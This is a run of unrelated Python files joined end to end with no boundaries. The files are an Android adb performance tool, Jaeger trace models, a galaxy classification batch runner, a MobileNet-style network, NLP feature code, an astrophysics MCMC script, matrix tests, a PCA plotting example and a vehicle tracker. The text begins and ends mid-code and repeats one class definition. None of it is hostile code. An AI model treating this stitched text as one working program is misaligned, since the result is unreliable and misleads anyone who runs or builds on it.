str = None): """ 查看app的gfxinfo """ return Gfxinfo.dump(self._get_app(app)).gfxinfo def gfx_hist(self, *, app: str = None): """ 查看每帧绘制耗时的直方图分布 """ Gfxinfo.dump(self._get_app(app)).hist() def gfx_fps(self, *, interval: int = 2, plot: bool = True, app: str = None): """ 计算fps, 并绘制fps变化走势图 """ Gfxinfo.trend(self._get_app(app), interval, plot) ################################ # Helper ################################ def dump_layout(self): """ 导出当前TOP Activity的布局 """ sh('adb shell uiautomator dump /sdcard/window_dump.xml; adb pull /sdcard/window_dump.xml') path = f'file://{os.path.abspath(".")}/window_dump.xml' open_with_webbrowser(path) def top_activity(self): """ 找出当前栈顶的页面 """ print() return sh("adb shell dumpsys activity activities | grep ResumedActivity | tail -1 | awk '{print $4}'") def top_app(self): """ 当前活跃的app package name """ 
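        # (docstring above: "package name of the currently active app") -- it is obtained
        # by splitting the component name returned by top_activity().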
print(self.top_activity().split('/')[0]) def screencap(self, file: str = "AndPerfScreencap.png"): """ 截图 Parameters: - file: 截图保存的file """ sh(f"adb shell screencap /sdcard/screencap.png; adb pull /sdcard/screencap.png {file}") open_with_webbrowser(f'file://{os.path.abspath(".")}/{file}') def dev_screen(self): """ 获取手机屏幕信息 """ print(sh("adb shell wm size")) print("density:", sh("adb shell getprop ro.sf.lcd_density")) def dev_mem(self): """ 设备内存大小信息 """ print(sh("adb shell cat /proc/meminfo")) print("LOW MEM?", sh("adb shell getprop ro.config.low_ram").strip() or "false") def systrace(self, *, app: str = None): """ 使用systrace """ app = self._get_app(app) systrace = self._config.get( 'systrace', '~/Library/Android/sdk/platform-tools/systrace/systrace.py') if not os.path.exists(os.path.expanduser(systrace)): print("no found systrace.py, please config using key: systrace") return print('wait for a while, generating systrace') out = f'{app}_systrace.html' try: sh(f"python2.7 {systrace} --app={app} --time=10 -o {out}") except Exception: print("need cmd python2.7 avaliable in path") return import webbrowser chrome = webbrowser.get('chrome') if chrome: chrome.open(f'file://{os.path.abspath(".")}/{out}') else: print(f'>>> 请使用chrome 打开 file://{os.path.abspath(".")}/{out}') def main(): import fire fire.Fire(AndPerf) if __name__ == '__main__': main() worker/models.py """module containing data models used by module""" import logging import json import uuid from typing import Any, List, Dict from datetime import datetime from pydantic import BaseModel LOGGER = logging.getLogger(__name__) class SpanTag(BaseModel): """Data class containing fields for a jaeger span""" key: str value_type: str value: Any class Config: fields = { 'value_type': 'type' } class JaegerProcess(BaseModel): """Data class containing fields for a jaeger process""" service_name: str tags: List[SpanTag] class Config: fields = { 'service_name': 'serviceName' } class JaegerSpan(BaseModel): """Data class containing fields to encapsulate a jaeger span""" trace_id: str span_id: str flags: int operation_name: str references: List start_time: datetime duration: int tags: List[SpanTag] logs: List process_id: str warnings: Any class Config: fields = { 'operation_name': 'operationName', 'start_time': 'startTime', 'trace_id': 'traceID', 'span_id': 'spanID', 'process_id': 'processID' } class JaegerTrace(BaseModel): """Data class containing fields needed for a complete jaeger trace""" trace_id: str spans: List[JaegerSpan] processes: Dict[str, JaegerProcess] warnings: Any class Config: fields = { 'trace_id': 'traceID' } if __name__ == '__main__': with open('./trace.json', 'r') as f: payload = json.load(f) trace = JaegerTrace(**payload) print(trace)batch.py import os import sys import numpy as np import pandas as pd import logging as log import datetime as dt import matplotlib.pyplot as plt from textwrap import TextWrapper as txwr import galaxy import post_process as pp Galaxy = galaxy.Galaxy # Create the /Logs folder for the root directory if it doesn't already exist if not os.path.isdir("Logs") : os.mkdir("Logs") def dateFmt () : """Returns the date component of the run log file""" dtStr = str(dt.datetime.now()) dtStr = dtStr[:dtStr.find('.')] dtStr = dtStr.replace(' ', '_') return dtStr # Set the logger for this run of classifications runlog = log.getLogger(__name__) runlog.setLevel(log.INFO) runLogPath = "Logs/run_{}.log".format(dateFmt()) fileHandler = log.FileHandler(runLogPath) fileHandler.setFormatter(log.Formatter("%(levelname)s : RUN_INIT : 
%(asctime)s : %(message)s", datefmt='%m/%d/%Y %I:%M:%S %p')) # Ensures that there is only one fileHandler for the current logger for h in runlog.handlers : runlog.removeHandler(h) runlog.addHandler(fileHandler) runlog.info("Batch runner started!") sys.setrecursionlimit(10**6) def logFixFmt (fix, k=50) : """ Formats error messages for the run logger """ return 2*(k*"#" + '\n') + txwr(width=k).fill(text=fix) + '\n' + 2*(k*"#" + '\n') class Batch () : """ Class that loads the FITS data corresponding to a .csv file of SDSS objIDs and performs DAGN classification on them """ batchRoot = "Batches" def getBatch (batchName, bands=Galaxy.default_bands, rad=40, csv=None) : """ Class method to get a batch """ try : batch = Batch(batchName, (batchName + ".csv") if csv is None else csv, bands, rad) except (FileNotFoundError, ValueError) as e : print("Error initialising batch!") print("Kindly check the latest message in the logfile '{}' for a fix.".format( os.path.join(os.getcwd(), runLogPath) )) print("Abort!") batch = None finally : return batch ############################################################################################################# ############################################################################################################# def __prelude__ (self) : """ Sets up files and folders and checks for existence of folder indicated by attribute batchName and the 'csv' filename """ # To access fileHandler of the logger global fileHandler fileHandler.setFormatter(log.Formatter("%(levelname)s : RUN_INIT : %(asctime)s : %(message)s", datefmt='%m/%d/%Y %I:%M:%S %p')) # Checks if the batchRoot directory has been created at the root directory runlog.info("Checking environment for the new batch.") if not os.path.isdir(Batch.batchRoot) : runlog.critical("Data folder not found!\n\n{}".format(logFixFmt( "Please create a folder named 'Data' in the notebook directory and rerun!" ))) raise FileNotFoundError # Checks if batchName folder exists in batchRoot if not os.path.isdir(self.batchFold) : runlog.critical("Batch folder not found\n\n{}".format(logFixFmt( "Please create a folder for the batch at '{}' and rerun!".format(self.batchFold) ))) raise FileNotFoundError ###################################################################### # Checks if the .csv file exists. If the 'csv' argument is None, the # name of the .csv file is taken to be the same name as its containing # folder ###################################################################### if not os.path.exists(self.csvPath) : runlog.critical("Batch .csv file at path '{}' not found\n\n{}".format(self.batchFold, logFixFmt( "Please supply the name of the appropriate .csv file and rerun!" ))) raise FileNotFoundError ###################################################################### # Changing name of the run log fileHandler to reflect the batch it is # presently handling ###################################################################### runlog.info("Valid environment! 
Changing log format to handle batch '{}'".format(self.batchName)) fileHandler.setFormatter(log.Formatter("%(levelname)s : {} : %(asctime)s : %(message)s".format(self.batchName), datefmt='%m/%d/%Y %I:%M:%S %p')) # Ensures only one fileHandler exists for h in runlog.handlers : runlog.removeHandler(h) runlog.addHandler(fileHandler) ###################################################################### # Creates a /FITS folder in the batch folder where all the FITS files will # be stored ###################################################################### if not os.path.exists(self.fitsFold) : os.mkdir(self.fitsFold) runlog.info("Created FITS folder for batch") else : runlog.info("FITS folder for the batch already exists") if not os.path.isdir(self.resFold) : os.mkdir(self.resFold) runlog.info("Created results folder for batch") else : runlog.info("Results folder for the batch already exists") def __setLoggers__ (self) : """ Sets a logger to record the results as a .csv file Can do because logging module of Python is thread-safe """ def setLogger (csvpath, loggername, headerline, runlogtype) : """ Internal function to get the logger """ # Creating the .csv file for results writeHeader = False if os.path.exists(csvpath) else True logger = log.getLogger(loggername) logger.setLevel(log.INFO) fh = log.FileHandler(csvpath) fh.setFormatter(log.Formatter("%(message)s")) # Ensuring only one file handler exists for h in logger.handlers : logger.removeHandler(h) logger.addHandler(fh) if writeHeader : logger.info(headerline) runlog.info(f"Created {runlogtype} csv") else : runlog.info(f"{runlogtype} csv already exists") return logger self.reslog = setLogger(self.resCsvPath, self.batchName + "_result", "objid,u-type,u-peaks,g-type,g-peaks,r-type,r-peaks,i-type,i-peaks", "result" ) self.purelog = setLogger(self.pureCsvPath, self.batchName + "_pure", "objid,bands,pid1,pid2", "pure" ) self.impurelog = setLogger(self.impureCsvPath, self.batchName + "_impure", "objid,u-type,u-peaks,g-type,g-peaks,r-type,r-peaks,i-type,i-peaks", "impure" ) def __setBatchList__ (self) : """ Sets the list of galaxies to classify - 1. Reads the main .csv file 2. Reads the .csv file which contains results of already classified galaxies 3. The set difference of (1) and (2) are the galaxies yet to be classified """ # try block to read the master .csv file try : df = pd.read_csv(self.csvPath, dtype=object, usecols=["objid", "ra", "dec"]) except ValueError as e : runlog.critical("Invalid columns in .csv file\n\n{}".format(logFixFmt( "Please ensure columns 'objid', 'ra' and 'dec' are present in the .csv \ file (in that order) and rerun!" ))) raise e # try block to read the result .csv file try : resIDs = [] if not os.path.exists(self.resCsvPath) else\ list(pd.read_csv(self.resCsvPath, dtype=object)['objid']) except ValueError as e : runlog.critical("Error in loading result csv file\n\n{}".format(logFixFmt( "Please ensure the first column in 'objid'. If the file is corrupted, delete \ it and rerun!" ))) self.galaxies = [(str(objid), (ra, dec)) for objid, ra, dec in zip(df["objid"], df["ra"], df["dec"]) if str(objid) not in resIDs] def __init__ (self, batchName, csvName, bands, rad) : """ Constructor for the batch. Does the following - 1. Sets up the folders/environment for the batch 2. Sets the result logger for the batch in the batch folder 3. 
Reads in the batch .csv and the result .csv file and decides which objects remain to be classified """ self.batchName = batchName self.csvName = csvName self.__prelude__() runlog.info("Successfully created environment for batch") # Function to check if the band(s) supplied by the user is valid areBandsValid = lambda bs : len([b for b in bs if b in Galaxy.default_bands]) == len(bs) != 0 ###################################################################### # If the bands are not valid, a warning is logged # This is because the Galaxy object internally takes care of # invalid bands ###################################################################### if not areBandsValid(bands) : runlog.warning("One or more bands in '{}' invalid\n\n{}".format(bands, logFixFmt( "Please ensure that bands are a combination of 'ugri' only!" ))) raise ValueError("Invalid Band. Please use 'ugri'") self.bands = bands # Sets the result logger for the batch self.__setLoggers__() # Initialises the galaxy objects that are yet to be classified in this batch self.__setBatchList__() print("Batch successfully initialised. \ \nThe classifications will be available at {} \ \nIn the event of any program crash/error, please check the log file at {} for details"\ .format(self.resCsvPath, os.path.join(os.getcwd(), runLogPath))) print("Number of galaxies to classify - {}".format(len(self.galaxies))) def __str__ (self) : """ Batch object to string """ return self.csvPath def __len__ (self) : """ Length of the batch """ return len(self.galaxies) @property def batchFold (self) : """ Property attribute - Path of the batch folder """ return os.path.join (os.getcwd(), Batch.batchRoot, self.batchName) @property def fitsFold (self) : """ Property attribute - Path of the FITS folder for the batch """ return os.path.join (self.batchFold, "FITS") @property def resFold (self) : """ Property attribute - Path of the folder that contains result images post classificaton """ return os.path.join(self.batchFold, "Results") @property def csvPath (self) : """ Property attribute - Path of the csv File """ return os.path.join(self.batchFold, self.csvName) @property def resCsvPath (self) : """ Property attribute - Path of the result .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_result.csv") @property def pureCsvPath (self) : """ Property attribute - Path of the pure .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_pure_pids.csv") @property def impureCsvPath (self) : """ Property attribute - Path of the impure .csv file """ return os.path.join(self.batchFold, self.csvName[:-4] + "_impure.csv") @property def logPath (self) : """ Property attribute - Path of the log file for the batch """ return os.path.join(os.getcwd(), self.batchFold, "{}.log".format(self.batchName)) def classifyGal (self, args) : """ Performs the following for an argument 1. Download the FITS file if necessary 2. Read the FITS file and obtain the cutout 3. Smoothen the cutout data 3. Find the hull region where peak searching is done 4. Filter the bands in this galaxy where signal is unlikely to be found 5. Fit the intensity distribution to a light profile 6. 
Find the peaks using Stochastic Hill Climbing and DFS """ try : args += (self.fitsFold, self.bands) g = Galaxy(*args) g.download() runlog.info("{} --> Downloaded".format(g.objid)) g.cutout() runlog.info("{} --> Loaded and done cutout".format(g.objid)) g.smoothen() runlog.info("{} --> Smoothed".format(g.objid)) g.hullRegion() runlog.info("{} --> Found hull region".format(g.objid)) g.filter() runlog.info("{} --> Filtered".format(g.objid)) g.fitProfile() runlog.info("{} --> Fit intensity profile".format(g.objid)) g.setPeaks() runlog.info("{} --> Found peaks".format(g.objid)) ret = (g.csvLine(), g.progressLine()) csvLine, progressLine = ret purity, rep_band = pp.get_purity_band(g) if rep_band is not None : if purity : bands = pp.get_bands_csv (g, self.bands) pid1, pid2 = pp.peak_to_objid(g.cutouts[rep_band].wcs, g.peaks[rep_band].filtPeaks) self.purelog.info(f"{g.objid},{bands},{pid1},{pid2}") else : self.impurelog.info(csvLine) for b in g.bands : if len(g.peaks[b].filtPeaks) != 2 : continue img = g.getPeaksMarked(b, True) plt.imshow(img) plt.axis('off') plt.savefig(os.path.join(self.resFold, "{}-{}_result.png".format(g.objid, b)), bbox_inches='tight', pad_inches=0) plt.close() runlog.info("{} --> Results for manual impure classification".format(g.objid)) except Exception as e : runlog.info("{} --> ERROR : {}".format(g.objid, e)) ret = (str(g.objid) + 2*len(self.bands)*",ERROR", str(g.objid) + " -->" + len(self.bands)*" ERROR") g.delete() runlog.info("{} --> Deleted files".format(g.objid)) del g return ret def classifySerial (self) : self.gals = [] for i, args in enumerate(self.galaxies) : csvLine, progLine = self.classifyGal(args) self.reslog.info(csvLine) print("{}. {}".format(i+1, progLine)) import torch.nn as nn import math import torch import torch.nn.functional as F def conv_bn(inp, oup, stride, k_size=3): return nn.Sequential( nn.Conv2d(inp, oup, k_size, stride, 1, bias=False), nn.BatchNorm2d(oup), nn.PReLU() ) def conv_1x1_bn(inp, oup): return nn.Sequential( nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), nn.PReLU() ) class DWC(nn.Module): def __init__(self, in_channels, out_channels): super(DWC, self).__init__() #self.depthwise = nn.Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=(7,6), #stride=1, padding=0, groups=in_channels, bias=False) self.batch_norm_in = nn.BatchNorm2d(in_channels) self.depthwise = nn.AvgPool2d((7, 6), stride=1, padding=0) self.pointwise = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=1, padding=0, bias=False) def forward(self, x): x = self.depthwise(x) #x = self.batch_norm_in(x) x = self.pointwise(x) return x class Max_AvgPool(nn.Module): def __init__(self, kernel_size=(3,3), stride=2, padding=1, dim=128): super(Max_AvgPool, self).__init__() self.Maxpool = nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) self.Avgpool = nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def forward(self, x): x = self.Maxpool(x) + self.Avgpool(x) # add some channelwise gating? return x class Max_AvgPool(nn.Module): def __init__(self, kernel_size=(3,3), stride=2, padding=1, dim=128): super(Max_AvgPool, self).__init__() self.Maxpool = nn.MaxPool2d(kernel_size=kernel_size, stride=stride, padding=padding) self.Avgpool = nn.AvgPool2d(kernel_size=kernel_size, stride=stride, padding=padding) def forward(self, x): x = self.Maxpool(x) + self.Avgpool(x) # add some channelwise gating? 
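        # One way to answer the question above (purely a sketch, not wired in): a
        # squeeze-and-excitation style gate would add, in __init__,
        #     self.gate = nn.Sequential(nn.Linear(dim, dim), nn.Sigmoid())
        # and here rescale the pooled sum per channel with
        #     x = x * self.gate(x.mean(dim=(2, 3)))[:, :, None, None]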
return x class gated_conv1x1(nn.Module): def __init__(self, inc=128, outc=128): super(gated_conv1x1, self).__init__() self.inp = int(inc/2) self.oup = int(outc/2) self.conv1x1_1 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=False) self.gate_1 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=True) self.conv1x1_2 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=False) self.gate_2 = nn.Conv2d(self.inp, self.oup, 1, 1, 0, bias=True) def forward(self, x): x_1 = x[:, :self.inp, :, :] x_2 = x[:, self.inp:, :, :] a_1 = self.conv1x1_1(x_1) g_1 = F.sigmoid(self.gate_1(x_1)) a_2 = self.conv1x1_2(x_2) g_2 = F.sigmoid(self.gate_2(x_2)) ret = torch.cat((a_1*g_1, a_2*g_2), 1) return ret class InvertedResidual_dwc(nn.Module): def __init__(self, inp, oup, stride, expand_ratio): super(InvertedResidual_dwc, self).__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(round(inp * expand_ratio)) self.use_res_connect = self.stride == 1 and inp == oup self.conv = [] if expand_ratio == 1: self.conv.append(nn.Conv2d(inp, hidden_dim, kernel_size=(3, 3), stride=stride, padding=1, groups=hidden_dim)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) #self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) else: #self.conv.append(gated_conv1x1(inc=inp,outc=hidden_dim)) self.conv.append(nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) self.conv.append(nn.Conv2d(hidden_dim, hidden_dim, kernel_size=(3, 3), stride=stride, padding=1, groups=hidden_dim)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) self.conv = nn.Sequential(*self.conv) def forward(self, x): if self.use_res_connect: return x + self.conv(x) else: return self.conv(x) class InvertedResidual(nn.Module): def __init__(self, inp, oup, stride, expand_ratio): super(InvertedResidual, self).__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(round(inp * expand_ratio)) self.use_res_connect = self.stride == 1 and inp == oup self.conv = [] if expand_ratio == 1: self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) else: #self.conv.append(gated_conv1x1(inc=inp,outc=hidden_dim)) self.conv.append(nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(hidden_dim)) self.conv.append(nn.PReLU()) self.conv.append(nn.MaxPool2d(kernel_size=(3, 3), stride=stride, padding=1)) #self.conv.append(gated_conv1x1(inc=hidden_dim,outc=oup)) self.conv.append(nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)) self.conv.append(nn.BatchNorm2d(oup)) self.conv = nn.Sequential(*self.conv) def forward(self, x): if self.use_res_connect: return x + self.conv(x) else: return self.conv(x) class Net(nn.Module): #mobileNet v2 def __init__(self, embedding_size=128, input_size=224, width_mult=1.): super(Net, self).__init__() block = InvertedResidual block_dwc = InvertedResidual_dwc input_channel = 64 last_channel = 256 interverted_residual_setting = [ # t, c, n, s [1, 64, 1, 1], # depthwise conv for first 
row [2, 64, 2, 1], [4, 64, 2, 2], [2, 64, 2, 1], [4, 64, 5, 1], [2, 64, 2, 2], [2, 64, 6, 2], ] # building first layer input_channel = int(input_channel * width_mult) self.last_channel = int(last_channel * width_mult) if width_mult > 1.0 else last_channel self.features = [conv_bn(3, input_channel, 2)] # building inverted residual cnt = 0 for t, c, n, s in interverted_residual_setting: output_channel = int(c * width_mult) for i in range(n): if cnt>1: if i == n - 1: # reduce the featuremap in the last. self.features.append(block_dwc(input_channel, output_channel, s, expand_ratio=t)) else: self.features.append(block_dwc(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel else: if i == n - 1: # reduce the featuremap in the last. self.features.append(block_dwc(input_channel, output_channel, s, expand_ratio=t)) else: self.features.append(block_dwc(input_channel, output_channel, 1, expand_ratio=t)) input_channel = output_channel cnt+=1 # building last several layers self.features.append(gated_conv1x1(input_channel, self.last_channel)) # make it nn.Sequential self.features_sequential = nn.Sequential(*self.features) # Global depthwise conv #self.GDCconv = DWC(self.last_channel, embedding_size) self._initialize_weights() def forward(self, x): x = self.features_sequential(x).view(-1, 256*4) return x def _initialize_weights(self): for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) if m.bias is not None: m.bias.data.zero_() elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() elif isinstance(m, nn.Linear): n = m.weight.size(1) m.weight.data.normal_(0, 0.01) m.bias.data.zero_()__author__ = 'wenqihe' from abstract_feature import AbstractFeature from em_token_feature import get_lemma class EMBrownFeature(AbstractFeature): def __init__(self, brown_file): with open(brown_file) as f: self.len = [4, 8, 12, 20] self.mapping = {} for line in f: items = line.strip('\r\n').split('\t') self.mapping[items[1]] = items[0] def apply(self, sentence, mention, features): for i in xrange(mention.start,mention.end): word = get_lemma(sentence.tokens[i], sentence.pos[i]) if word in self.mapping: cluster = self.mapping[word] for l in self.len: if len(cluster) >= l: features.append('BROWN_%d_%s' % (l, cluster[0:l])) features.append('BROWN_ALL_%s' % cluster) pepCV/PyFstat1-10 #!/usr/bin/env python import pyfstat F0 = 30.0 F1 = -1e-10 F2 = 0 Alpha = 0.5 Delta = 1 minStartTime = 1000000000 maxStartTime = minStartTime + 200 * 86400 Tspan = maxStartTime - minStartTime tref = minStartTime DeltaF0 = 6e-7 DeltaF1 = 1e-13 theta_prior = { "F0": {"type": "unif", "lower": F0 - DeltaF0 / 2.0, "upper": F0 + DeltaF0 / 2.0}, "F1": {"type": "unif", "lower": F1 - DeltaF1 / 2.0, "upper": F1 + DeltaF1 / 2.0}, "F2": F2, "Alpha": Alpha, "Delta": Delta, "transient_tstart": minStartTime, "transient_duration": { "type": "halfnorm", "loc": 0.001 * Tspan, "scale": 0.5 * Tspan, }, } ntemps = 2 log10beta_min = -1 nwalkers = 100 nsteps = [100, 100] mcmc = pyfstat.MCMCTransientSearch( label="transient_search", outdir="data_l", sftfilepattern="data_l/*simulated_transient_signal*sft", theta_prior=theta_prior, tref=tref, minStartTime=minStartTime, maxStartTime=maxStartTime, nsteps=nsteps, nwalkers=nwalkers, ntemps=ntemps, log10beta_min=log10beta_min, transientWindowType="rect", ) mcmc.run() mcmc.plot_corner(label_offset=0.7) mcmc.print_summary() 1-10 """Test matrix.py.""" from random import randint 
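# The random indices in the assertions below are safe: the checks either hold at every
# position (e.g. m[i, j] == t[j, i] for a transpose) or are made on constant-filled
# matrices, where, for example, multiplying two 3x3 matrices of 2s gives 2*2*3 == 12 in
# every cell.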
import pytest from pyadt import Matrix @pytest.fixture def mock_matrix(): return Matrix(3, 3, 2) def test_build(mock_matrix): assert mock_matrix.size == (3, 3) assert mock_matrix[0, 0] == 2 def test_rows(mock_matrix): assert mock_matrix.rows == 3 def test_rows_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.rows = 10 def test_cols(mock_matrix): assert mock_matrix.cols == 3 def test_cols_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.cols = 10 def test_size(mock_matrix): assert mock_matrix.size == (3, 3) def test_size_assign(mock_matrix): with pytest.raises(AttributeError): mock_matrix.size = (5, 5) def test_scale_by(mock_matrix): mock_matrix.scale_by(4) assert mock_matrix[randint(0, 2), randint(0, 2)] == 8 def test_transpose(): m = Matrix.from_list_of_lists([[1, 2, 3], [3, 4, 5]]) t = m.transpose() i = randint(0, 1) j = randint(0, 1) assert t.size == (3, 2) assert m[i, j] == t[j, i] def test_add(): m = Matrix(3, 3, 10) n = m.add(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 12 o = m + n assert o[randint(0, 2), randint(0, 2)] == 22 def test_subtract(): m = Matrix(3, 3, 10) n = m.subtract(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 8 o = m - n assert o[randint(0, 2), randint(0, 2)] == 2 def test_multiply(): m = Matrix(3, 3, 2) n = m.multiply(Matrix(3, 3, 2)) assert n[randint(0, 2), randint(0, 2)] == 12 o = m * Matrix(3, 3, 2) assert o[randint(0, 2), randint(0, 2)] == 12 def test_from_list_of_lists(): m = Matrix.from_list_of_lists([[1, 2], [3, 4], [5, 6]]) assert m.size == (3, 2) """Generates some data from random gaussian blobs and renders it""" import matplotlib.pyplot as plt import matplotlib.colors as mcolors import pca3dvis.pcs as pcs import pca3dvis.worker as worker import numpy as np FEATURES = 10 """The embedded space of the generated data. Every later snapshot has one more feature just to see that doesn't hurt anything""" CLUSTERS = 5 """How many clusters are made in the embedding space""" SNAPSHOTS = 2 """How many "snapshots" we generate""" SAMPLES_PER_CLUST = 200 """How many samples in each cluster""" CLUST_STD = 0.2 """Standard deviation of each cluster""" DRAFT = True """If draft settings are used for the video (ie. lower quality, but faster)""" def gaus_ball(center: np.ndarray, std: int, num_samples: int): """Produces a gaussian ball with the given center and std deviation""" return ( np.random.randn(num_samples, center.shape[0]).astype(center.dtype) * std + center ) def _main(): # First generate some data! datas = [] for snap in range(SNAPSHOTS): # We are looping over each of the snapshots we have. 
Since we are # generating points randomly, these snapshots are meaningless, but # we will see how these points are rendered centers = np.random.uniform(-2, 2, (CLUSTERS, FEATURES + snap)) # Get a center for each cluster uniformly on a cube with sidelengths # 4 centered at the origin data = np.concatenate( tuple( gaus_ball(cent, CLUST_STD, SAMPLES_PER_CLUST) for cent in centers ), 0 ) # Sample 200 points from each cluster and append them to the data # (but faster) datas.append(data) lbls = np.concatenate( tuple( np.zeros((SAMPLES_PER_CLUST,), data.dtype) + i for i in range(CLUSTERS) ), 0 ) # Each cluster has its own label cmap = plt.get_cmap('Set1') markers = [ # An array with 1 marker for each point ( # The first marker np.ones(lbls.shape, dtype='bool'), # a mask containing every point { 'c': lbls, # color these points based on their label 'cmap': cmap, # to decide to color from the label, use the colormap 's': 20, # the points should be around 20px 'marker': 'o', # use a circle to represent these points 'norm': mcolors.Normalize(0, CLUSTERS - 1) # the smallest label is 0, largest is CLUSTERS-1 } ) ] proj = pcs.get_pc_trajectory(datas, lbls) # This performs linear dimensionality-reduction using principal component # analysis to get the three-dimensional points we can actually plot worker.generate( proj, # Plot the points we found markers, # use the markers we made earlier ['Gaussian Balls (1)', 'Gaussian Balls (2)'], # title the different slices as so 'out/examples/gaus_balls', # store the result in this folder DRAFT # determines if we should store low quality (if True) or high quality (if False) ) # That's it! if __name__ == '__main__': _main() tests/test_metadata.py import sys import pathlib import contextlib import tempfile import pytest import json import sxs from .conftest import shortest_metadata, shortest_metadata_txt def test_json_conversion(): with contextlib.redirect_stdout(None): sxs.load(shortest_metadata, download=True, cache=True) try: sxs.load(shortest_metadata_txt, download=True, cache=True) except ValueError: pass path_json = sxs.utilities.cached_path(shortest_metadata) path_txt = sxs.utilities.cached_path(shortest_metadata_txt) m = sxs.Metadata.from_txt_file(path_txt, cache_json=False) with tempfile.TemporaryDirectory() as temp_dir: temp_dir_path = pathlib.Path(temp_dir) temp_path = temp_dir_path / "metadata" m.to_json_file(temp_path) with path_json.open("r") as f1: m1 = json.load(f1) with temp_path.with_suffix(".json").open("r") as f2: m2 = json.load(f2) for key in m2: if key.startswith("reference_") or key.startswith("initial_"): assert m1[key] == m2[key] import enum import os from pathlib import Path from threading import Thread from time import time import math import dlib import cv2 from copy import deepcopy from Mosse_Tracker.Mosse import MOSSE from Mosse_Tracker.utils import draw_str from Mosse_Tracker.utils import RectSelector import sys, getopt from System.Data.CONSTANTS import Work_Tracker_Interpolation pi=22/7 global id id = 0 global frames frames = [] class TrackerType(enum.Enum): MOSSE = 1 DLIB = 2 class Tracker: def __init__(self, frame, cut_size, frame_width, frame_height, tracker_id =0, tracker_type = TrackerType.MOSSE): self.history = [] self.tracker_type = tracker_type xmin, ymin, xmax, ymax = cut_size self.width, self.height = map(cv2.getOptimalDFTSize, [xmax - xmin, ymax - ymin]) if tracker_type == TrackerType.MOSSE: self.tracker = MOSSE(frame, cut_size,learning_rate=0.225,psrGoodness=5) self.addHistory(self.tracker.getCutFramePosition()) else: xmin, 
ymin, xmax, ymax = cut_size self.tracker = dlib.correlation_tracker() self.tracker.start_track(frame, dlib.rectangle(int(xmin), int(ymin), int(xmax), int(ymax))) self.addHistory([xmin, ymin, xmax, ymax]) self.dx = [] self.dy = [] xmin, ymin, xmax, ymax = cut_size self.vehicle_width, self.vehicle_height = map(cv2.getOptimalDFTSize, [xmax - xmin, ymax - ymin]) self.frame_width =frame_width self.frame_height= frame_height self.tracker_id =tracker_id self.index = 0 self.avg_speed = [None]*30 self.estimationFutureCenter = [-1]*30 #add current cut frame in history for later use #only append the dimensins : [xmin,ymin,xmax,ymax] def addHistory(self,cut_size): self.history.append(cut_size) #get history in :[[xmin,ymin,xmax,ymax]] def getHistory(self): return self.history #update the tracker to current frame #also add the updated position to history def update(self, frame): if self.tracker_type == TrackerType.MOSSE: is_stopped = False if len(self.tracker.dx) >= 3 and Work_Tracker_Interpolation: if self.getAvgSpeed(len(self.tracker.dx)-3,len(self.tracker.dx)) < 20: is_stopped = True # print(self.getAvgSpeed(len(self.tracker.dx)-3,len(self.tracker.dx))) self.tracker.updateTracking(frame,is_stopped) self.addHistory(self.tracker.getCutFramePosition()) else: self.tracker.update(frame) if len(self.dx) == 0: self.dx.append(0) self.dy.append(0) else: x,y = self.get_position() xold,yold = self.get_position(self.history[-1]) dx, dy = x - xold, y - yold self.dx.append(dx) self.dy.append(dy) self.addHistory(self.getCutFramePosition(self.get_position())) return self.history[-1] #get last tracker position def getTrackerPosition(self): return self.history[-1] #only for dlib tracker def getCutFramePosition(self,center): if center == -1: center = self.center x = center[0] y = center[1] xmin = int(x - 0.5*(self.width-1)) ymin = int(y - 0.5*(self.height-1)) xmax = int(self.width+xmin) ymax = int(self.height+ymin) cut_size = [xmin,ymin,xmax,ymax] return cut_size #only for dlib tracker def get_position(self,cut_size = None): if cut_size == None: pos = self.tracker.get_position() xmin = int(pos.left()) ymin = int(pos.top()) xmax = int(pos.right()) ymax = int(pos.bottom()) else: xmin,ymin,xmax,ymax = cut_size x = int(xmin + 0.5*self.width) y = int(ymin + 0.5*self.height) return (x,y) #get dimensions of the history to be able to make video clip later def getTrackedFramesBoxed(self,last_no_of_frame = 0,after_no_of_frames = 1): xmin = self.history[-after_no_of_frames][0] 